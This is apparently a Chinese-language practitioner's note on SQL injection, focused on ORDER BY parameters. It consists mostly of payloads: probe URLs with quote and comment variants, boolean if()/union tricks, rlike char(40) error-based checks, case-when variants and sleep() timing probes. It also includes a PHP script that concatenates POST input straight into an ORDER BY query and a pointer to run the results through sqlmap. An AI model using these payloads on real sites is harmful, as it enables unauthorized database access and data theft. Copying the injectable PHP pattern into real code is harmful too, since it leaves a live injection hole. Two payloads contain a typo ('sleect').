http://e.com/1.php?id=1 http://e.com/1.php?id=1-- sd http://e.com/1.php?id=aaa http://e.com/1.php?id=aaa'-- sd http://e.com/1.php?id=aaa http://e.com/1.php?id=aaa' ' http://e.com/1.php?id=aaa'||' http://e.com/1.php?id=aaa'%2b' id=1 and 1=if(1=2,1,(select 1 union select 2)) id=1 and 1=if(1=1,1,(select 1 union select 2)) id=1 order by 1 正常 id=1 order by 1, 錯誤 id=1 order by 1, 1 正常 Content-Type: application/json 時: 可以嘗試用 \u0027 代替單引號。
orderby 注入:
<?php $con = mysql_connect("localhost","root","123456") or die(); mysql_select_db("burp"); $orderby = $_POST['orderby']; $order = $_POST['order']; $sql = "select * from `sql` order by ".$orderby." ".$order; echo $sql; $res = mysql_query($sql); echo "<br><br>"; echo "<b>"; while($rows = @mysql_fetch_array($res,MYSQL_ASSOC)){ echo $rows['new']; } echo "<b>"; ?>
上面的代碼 $orderby 和 $order 都存在注入
這里一般遇到order orderby 參數 我一般會這樣來測
orderby=id,&order=asc
orderby=id,1&order=asc
所以可以這樣來進行注入
,if(1=1,1,(select 1 union sleect 2))
,if(1=2,1,(select 1 union sleect 2))
然后就可以放進sqlmap 愉快的跑了。
order 參數同上。
下面說另外一種注入方法:
先列2個語句
mysql> select user from mysql.user where user='admin' order by user rlike char(40); ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp mysql> select user from mysql.user where user='admin' order by user rlike 1; +-------+ | user | +-------+ | admin | +-------+ 1 row in set (0.00 sec)
所以就可以構造這樣的語句
orderby=id&order=rlike if(1=1,1,char(40))
orderby=id&order=rlike if(1=21,1,char(40))
或者 rlike (case when 1=1 then 1 else (select 1 union select 2)end)
跑數據就可以
rlike (case when 1=1 sqlinject then 1 else (select 1 union select 2)end)
最后也可以 使用sleep 來進行判斷注入
orderby=sleep(1)&order=asc
